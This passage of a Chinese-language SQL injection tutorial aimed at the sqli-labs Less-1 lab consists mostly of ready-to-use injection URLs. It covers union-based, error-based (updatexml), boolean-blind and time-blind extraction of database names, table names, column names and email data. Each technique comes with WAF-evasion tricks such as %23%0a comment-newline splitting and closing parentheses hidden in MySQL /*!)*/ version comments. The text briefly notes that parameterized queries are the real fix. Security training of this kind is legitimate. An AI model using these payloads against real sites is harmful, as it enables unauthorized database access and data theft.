http://172.16.1.157/sql/Less-1/?id=-1' union %23asdasdasd%0a select 1,(select schema_name from %23%0ainformation_schema.schemata limit 1,1),3 -- +
查表名：仍然查 information_schema.tables，用 table_schema=database() 限定当前库；关键字之间以及 database 与它的右括号之间都插入 %23…%0a（即 `#注释` + 换行）把 payload 拆开。
http://172.16.1.157/sql/Less-1/?id=-1' union %23asdasdasd%0a select 1,(select table_name from %23%0ainformation_schema.tables where table_schema=database(%23%0a) limit 1,1),3 -- +
查列名。先看未拦截 information_schema 的情况：直接查 information_schema.columns，表名用十六进制 0x7573657273（即 'users'）给出，避免出现引号。
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0a select 1,(select column_name from %23%0a information_schema.columns where table_name=0x7573657273 and%23a%0a table_schema=database(%23%0a) limit 1,1),3 -- +
拦截 information_schema 之后还有两种姿势，但两种都要求事先已经知道表名（靠猜测或从别处泄露）。需要说明的是，这类基于关键字或括号匹配的 WAF 只能缓解而不能根治，代码侧的根本修复仍然是参数化查询。
一、子查询：把 (select 1)a,(select 2)b 与目标表 union，派生表 x 的列名就固定为 1、2，之后用 x.2 按位置取第二列，不需要知道真实列名；前提是 union 两侧列数一致，否则会报列数不匹配。
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0a SELECT 1,2,x.2 from %23a%0a(SELECT * from %23a%0a (SELECT 1)a, (SELECT 2)b union %23a%0aSELECT *from %23a%0aemails)x limit 2,1 -- +
二、用 join + using 报错爆列名：emails a join emails b 自连接时，select * 会因为两侧列名重复而报 Duplicate column name 错误，错误信息里就带出了第一个列名；前提是页面回显数据库报错，并且已知表名。
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select * from %23a%0a(select * from %23a%0aemails a join emails b) c) -- +
然后加上 using(id) 把已经爆出的那一列合并掉，报错信息就会转到下一个重复列名；逐个追加 using 里的列即可依次爆出全部列名。
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select * from %23a%0a(select * from %23a%0aemails a join emails b using(id)) c) -- +
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,user(/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,database(/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
库名（updatexml 报错注入）：0x7e 即 '~'，用来在报错信息中标出结果边界；所有右括号都写成 /*!)*/ 藏进 MySQL 版本注释里，MySQL 仍会执行注释内容，但 WAF 匹配不到成对括号。
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select schema_name from %23a%0a information_schema.schemata limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
表名（同上，用 table_schema=database() 限定当前库，limit 1,1 逐条取）
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select table_name from %23a%0a information_schema.tables where table_schema=database(/*!)*/ limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
列名（table_name 仍用十六进制 0x7573657273 表示 'users'，避免引号）
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select column_name from %23a%0a information_schema.columns where table_schema=database(/*!)*/ and %23a%0atable_name=0x7573657273 limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
查数据（不再经过 information_schema，直接从 emails 表取 email_id）
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,(select email_id from %23a%0a emails limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
5 盲注
这里分布尔盲注和时间盲注两种来说。下面所有绕过手法都依赖 MySQL 方言（# 行注释、/*! */ 版本注释、<=> 等），换其他数据库并不适用。
5.1 布尔盲注
思路同样是不让 WAF 匹配到完整的括号对：右括号一律写成 /*!)*/，藏进版本注释里。
使用 left() 或者 right() 逐字符截取，再用 hex() 转成十六进制与常量比较（72 即字符 r 的 hex 值）；等号右侧同样可以插 %23a%0a 拆开。
http://172.16.1.157/sql/Less-1/?id=1' and hex(LEFT(user(/*!)*/,1))=%23a%0a72 -- +
http://172.16.1.157/sql/Less-1/?id=1' and hex(right(user(/*!)*/,1))=%23a%0a72 -- +
使用 substring() 或 substr()，效果相同：取第 1 位，hex 后与 72 比较。
http://172.16.1.157/sql/Less-1/?id=1' and hex(SUBSTRING(user(/*!)*/,1,1))=72 -- +
http://172.16.1.157/sql/Less-1/?id=1' and hex(substr(user(/*!)*/,1,1))=72 -- +
查表名：注意这里连 database 和它的左括号之间都用 %23a%0a 拆开了；65 即字符 e 的 hex 值，limit 0,1 取第一张表。
http://172.16.1.157/sql/Less-1/?id=1' and hex(SUBSTR((select table_name from %23a%0a information_schema.tables where table_schema=%23a%0adatabase%23a%0a(/*!)*/ limit 0,1),1,1))=65-- +
列名和字段值同理，把子查询换成 information_schema.columns 或目标表即可，略。
5.2 时间盲注
同样不让 WAF 匹配到成对括号，右括号继续用 /*!)*/ 隐藏。
sleep() 绕过：先用 and sleep(3/*!)*/ 确认延时注入存在。
http://172.16.1.157/sql/Less-1/?id=1' and sleep(3/*!)*/-- +
查用户：用 if(条件, sleep(3), 1) 做判断，if 与它的左括号之间插 %23%0a；比较值可写成 char(114) 或 0x72（都是字符 r）。
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left(user(/*!)*/,1/*!)*/=char(114),sleep(3/*!)*/,1/*!)*/ -- +
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left(user(/*!)*/,1/*!)*/=0x72,sleep(3/*!)*/,1/*!)*/ -- +
查数据：此处 limit 被拦截，改用 group_concat() 把整列合并成一个字符串再逐字符比较；时间盲注每个字符都要等一次 sleep，代价很高。
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left((select group_concat(table_name/*!)*/ from%23a%0ainformation_schema.tables where table_schema=database(/*!)*/ /*!)*/,1/*!)*/=0x65,sleep(5/*!)*/,1/*!)*/ -- +
6 其他
length() 求长度：这里用 <=>（MySQL 的 NULL 安全等号）代替 =，两侧非 NULL 时语义与 = 相同；注意第二条把 length( 和 database( 的两个右括号一起写进了 /*!))*/。
http://172.16.1.157/sql/Less-1/?id=1' and length(1)<=>1 -- +
http://172.16.1.157/sql/Less-1/?id=1' and length(database(/*!))*/<=>8 -- +
count()：子查询 (select count(password) from users) 与 13 比较，用来探测 users 表的行数；子查询的左括号后面插了 %23a%0a，两个右括号各自藏进 /*!)*/。
http://172.16.1.157/sql/Less-1/?id=1' and (%23a%0aselect count(password/*!)*/ from %23a%0a users/*!)*/<=>13 -- +